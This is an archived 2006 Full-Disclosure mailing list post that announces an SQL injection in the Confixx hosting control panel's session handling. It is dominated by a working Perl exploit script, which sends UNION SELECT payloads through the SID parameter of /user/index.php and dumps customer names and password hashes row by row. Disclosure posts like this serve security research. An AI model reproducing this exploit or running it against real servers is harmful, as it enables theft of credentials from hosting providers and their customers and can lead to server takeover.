lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Tue Apr 18 23:01:11 2006
From: defa at systemli.org (defa)
Subject: Confixx Index.PHP SQL Injection Vulnerability
	(Exploit - not new vuln)

Here is more information on the confixx vuln released by LoK Crew.  
Sorry for the poor quality of this posting, I was short of time.

Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best  
value, proven quality, fully developed feature set and quality  
support. The software?s powerful features have been especially  
designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/

Risk: High - eventually remote root access
^^^^

Serverity: High
^^^^^^^^

Discussion:
^^^^^^^^^^^
The vuln itself can be found in the html/session.inc.php in the  
function sessao_read( $sKey ) which is used to overwrite the php-own  
session methods.
The file "loginform.php" can be used to display e.g. admin hashes.  
Read the rest by studying the attached exploit.

Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt

Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/


Code:
^^^^^

--------------- <snip> -------------

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
   [URL] - server url
);
exit;
}

$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
{
#$i=1;
$hit = 0;
$url = "http://";
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:% 
20',";
$url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden 
%20LIMIT%20";
$url .= "$i,1/*";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";


print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /<p>HIT:/)
	{
		# $answer =~ s/<[A-Z,a-z,=].+>//g;
		print "$answer";
		$hit = 1;
	}

}
if ($hit == 0) {die("that's it");}
}

--------------- <snap> -------------

bye
defa

--
don't eat yellow snow

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ